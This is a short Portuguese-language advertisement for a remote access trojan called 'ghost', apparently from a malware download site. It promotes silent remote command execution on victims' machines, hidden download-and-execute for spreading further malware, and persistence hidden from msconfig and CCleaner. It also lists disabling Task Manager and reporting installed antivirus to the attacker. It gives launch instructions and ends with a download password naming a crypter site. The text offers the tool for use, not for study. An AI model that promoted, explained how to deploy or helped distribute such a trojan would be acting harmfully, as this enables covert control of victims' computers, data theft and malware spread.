O ghost é um RAT leve que fornece ao servidor / invasor acesso remoto completo ao interpretador de linha de comando do usuário (cmd.exe). Eles têm permissão para executar comandos silenciosamente, sem que o cliente / zumbi perceba. O servidor / atacante também tem a capacidade de baixar e executar arquivos no computador do cliente / zumbi. Este também é um processo silencioso e oculto. Como a maioria dos cavalos de Troia de acesso remoto, esse recurso de download e execução ajuda a distribuir vírus e outras partes de malware.
Este malware é distribuído simplesmente executando o zombie.exe . Este nome de arquivo pode ser alterado para qualquer que seja. Não há restrição. Quando executado, ele procura os dois primeiros argumentos (IP e porta). Se nenhum deles for fornecido, o programa não será executado. Com isso dito, certifique-se de fornecer o IP e a porta do servidor nos argumentos da linha de comando. Exemplo:
zombie.exe 127.0.0.1 27015Bot Features
- Execução de comando remoto
- Processo silencioso em segundo plano
- Baixe e execute o arquivo (Oculto)
- Inicialização no modo de segurança
- Conectará automaticamente ao servidor
- Os dados enviados e recebidos são criptografados (cifra de substituição)
- Arquivos ocultos
- Antivírus instalado mostrado ao servidor
- Espalhe facilmente malware através do recurso de download
- As informações de inicialização não são exibidas no msconfig ou em outros programas de verificação de inicialização, como o CCleaner
- Desativar o Gerenciador de tarefas
Quando iniciado com êxito, ele se adiciona ao pool de inicialização e é executado silenciosamente em segundo plano. Ele tentará se conectar repetidamente ao servidor. Esse processo não monopoliza qualquer uso de memória ou CPU. Isso significa que o zumbi silenciosamente fica ocioso em segundo plano e sempre que o servidor estiver ativo, ele se conectará automaticamente.
DownloadPassword: fullcrypters.net
